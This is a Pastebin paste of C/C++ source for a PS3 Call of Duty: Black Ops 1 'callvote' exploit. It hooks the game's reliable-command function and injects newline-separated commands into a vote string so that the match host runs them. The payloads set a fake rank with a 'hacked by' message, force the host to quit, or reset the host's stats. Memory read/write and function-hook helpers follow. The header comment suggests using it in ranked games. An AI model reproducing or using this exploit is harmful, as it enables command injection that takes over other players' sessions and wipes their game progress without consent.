Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
- Credits:
- http://old.zenhax.com/quake3-engine-callvote-bug-t686.html
- Luigi for documenting Quake 3 callvote Exploite
- 01cedricv2 for showing Quake documentation to Jo-Milk
- and Jo-Milk for porting to PS3
- This can be ported on Bo2 [Tested] and Other cods
- This infects the host once Vote passes to do so
- you need to join your friend in a private match
- He'll need to be the host:
- 1st way is:
- you tell him to go spectator and you spawn in and use cbuf_AddText
- 2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host
- this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
- */
- #define TOC 0x0072DCE8//1.13
- int var = 1;//change this value to change the infection type
- int cbuf[] = { 0x00399CC8, TOC };
- void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;
- void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
- __nop();
- __nop();
- __nop();
- __nop();
- __nop();
- __nop();
- __nop();
- }
- void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
- {
- if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
- {
- switch (var)
- {
- case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
- case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
- case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
- default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
- }
- }
- else
- {
- MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
- }
- }
- /*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
- but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/
- /*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
- cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");
- /*--------------------------------------------------Extra----------------------------------------------------------------------*/
- //read write syscalls
- int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
- {
- system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
- return_to_user_prog(int32_t);
- }
- template<typename T>
- int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
- {
- return sys_dbg_read_process_memory(address, &data, size);
- }
- int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
- {
- system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
- return_to_user_prog(int32_t);
- }
- template<typename T>
- int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
- {
- return sys_dbg_write_process_memory(address, &value, size);
- }
- void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
- {
- uint32_t normalFunctionStub[8], hookFunctionStub[4];
- sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
- normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
- normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
- normalFunctionStub[6] = 0x7D6903A6;
- normalFunctionStub[7] = 0x4E800420;
- sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
- hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
- hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
- hookFunctionStub[2] = 0x7D6903A6;
- hookFunctionStub[3] = 0x4E800420
- sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
- }
- HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement